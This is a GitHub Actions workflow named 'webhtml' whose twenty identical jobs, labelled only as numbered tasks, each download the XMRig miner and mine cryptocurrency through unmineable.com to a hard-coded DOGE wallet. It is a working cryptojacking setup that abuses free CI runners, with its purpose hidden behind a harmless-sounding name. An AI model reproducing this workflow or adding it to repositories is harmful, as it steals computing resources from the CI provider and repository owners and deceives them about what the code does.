name: webhtml

on:
  workflow_dispatch:

jobs:

  start_task_1:
    name: Start Task 1
    runs-on: ubuntu-latest
    steps:
      - name: Jalankan Task 1
        run: |  
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u DOGE:DJ3z9tzwpXYtpvnQoc1jxUwkjZ4Bjim12e.Sal99 -p x --tls --threads=4

  start_task_2:
    name: Start Task 2
    runs-on: ubuntu-latest
    steps:
      - name: Jalankan Task 2
        run: |  
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u DOGE:DJ3z9tzwpXYtpvnQoc1jxUwkjZ4Bjim12e.Sal99 -p x --tls --threads=4

  start_task_3:
    name: Start Task 3
    runs-on: ubuntu-latest
    steps:
      - name: Jalankan Task 3
        run: |  
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u DOGE:DJ3z9tzwpXYtpvnQoc1jxUwkjZ4Bjim12e.Sal99 -p x --tls --threads=4

  start_task_4:
    name: Start Task 4
    runs-on: ubuntu-latest
    steps:
      - name: Jalankan Task 4
        run: |  
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u DOGE:DJ3z9tzwpXYtpvnQoc1jxUwkjZ4Bjim12e.Sal99 -p x --tls --threads=4

  start_task_5:
    name: Start Task 5
    runs-on: ubuntu-latest
    steps:
      - name: Jalankan Task 5
        run: |  
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u DOGE:DJ3z9tzwpXYtpvnQoc1jxUwkjZ4Bjim12e.Sal99 -p x --tls --threads=4

  start_task_6:
    name: Start Task 6
    runs-on: ubuntu-latest
    steps:
      - name: Jalankan Task 6
        run: |  
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u DOGE:DJ3z9tzwpXYtpvnQoc1jxUwkjZ4Bjim12e.Sal99 -p x --tls --threads=4

  start_task_7:
    name: Start Task 7
    runs-on: ubuntu-latest
    steps:
      - name: Jalankan Task 7
        run: |  
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u DOGE:DJ3z9tzwpXYtpvnQoc1jxUwkjZ4Bjim12e.Sal99 -p x --tls --threads=4

  start_task_8:
    name: Start Task 8
    runs-on: ubuntu-latest
    steps:
      - name: Jalankan Task 8
        run: |  
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u DOGE:DJ3z9tzwpXYtpvnQoc1jxUwkjZ4Bjim12e.Sal99 -p x --tls --threads=4

  start_task_9:
    name: Start Task 9
    runs-on: ubuntu-latest
    steps:
      - name: Jalankan Task 9
        run: |  
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u DOGE:DJ3z9tzwpXYtpvnQoc1jxUwkjZ4Bjim12e.Sal99 -p x --tls --threads=4

  start_task_10:
    name: Start Task 10
    runs-on: ubuntu-latest
    steps:
      - name: Jalankan Task 10
        run: |  
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u DOGE:DJ3z9tzwpXYtpvnQoc1jxUwkjZ4Bjim12e.Sal99 -p x --tls --threads=4

  start_task_11:
    name: Start Task 11
    runs-on: ubuntu-latest
    steps:
      - name: Jalankan Task 11
        run: |  
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u DOGE:DJ3z9tzwpXYtpvnQoc1jxUwkjZ4Bjim12e.Sal99 -p x --tls --threads=4

  start_task_12:
    name: Start Task 12
    runs-on: ubuntu-latest
    steps:
      - name: Jalankan Task 12
        run: |  
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u DOGE:DJ3z9tzwpXYtpvnQoc1jxUwkjZ4Bjim12e.Sal99 -p x --tls --threads=4

  start_task_13:
    name: Start Task 13
    runs-on: ubuntu-latest
    steps:
      - name: Jalankan Task 13
        run: |  
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u DOGE:DJ3z9tzwpXYtpvnQoc1jxUwkjZ4Bjim12e.Sal99 -p x --tls --threads=4

  start_task_14:
    name: Start Task 14
    runs-on: ubuntu-latest
    steps:
      - name: Jalankan Task 14
        run: |  
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u DOGE:DJ3z9tzwpXYtpvnQoc1jxUwkjZ4Bjim12e.Sal99 -p x --tls --threads=4

  start_task_15:
    name: Start Task 15
    runs-on: ubuntu-latest
    steps:
      - name: Jalankan Task 15
        run: |  
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u DOGE:DJ3z9tzwpXYtpvnQoc1jxUwkjZ4Bjim12e.Sal99 -p x --tls --threads=4

  start_task_16:
    name: Start Task 16
    runs-on: ubuntu-latest
    steps:
      - name: Jalankan Task 16
        run: |  
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u DOGE:DJ3z9tzwpXYtpvnQoc1jxUwkjZ4Bjim12e.Sal99 -p x --tls --threads=4

  start_task_17:
    name: Start Task 17
    runs-on: ubuntu-latest
    steps:
      - name: Jalankan Task 17
        run: |  
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u DOGE:DJ3z9tzwpXYtpvnQoc1jxUwkjZ4Bjim12e.Sal99 -p x --tls --threads=4

  start_task_18:
    name: Start Task 18
    runs-on: ubuntu-latest
    steps:
      - name: Jalankan Task 18
        run: |  
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u DOGE:DJ3z9tzwpXYtpvnQoc1jxUwkjZ4Bjim12e.Sal99 -p x --tls --threads=4

  start_task_19:
    name: Start Task 19
    runs-on: ubuntu-latest
    steps:
      - name: Jalankan Task 19
        run: |  
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u DOGE:DJ3z9tzwpXYtpvnQoc1jxUwkjZ4Bjim12e.Sal99 -p x --tls --threads=4

  start_task_20:
    name: Start Task 20
    runs-on: ubuntu-latest
    steps:
      - name: Jalankan Task 20
        run: |  
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u DOGE:DJ3z9tzwpXYtpvnQoc1jxUwkjZ4Bjim12e.Sal99 -p x --tls --threads=4
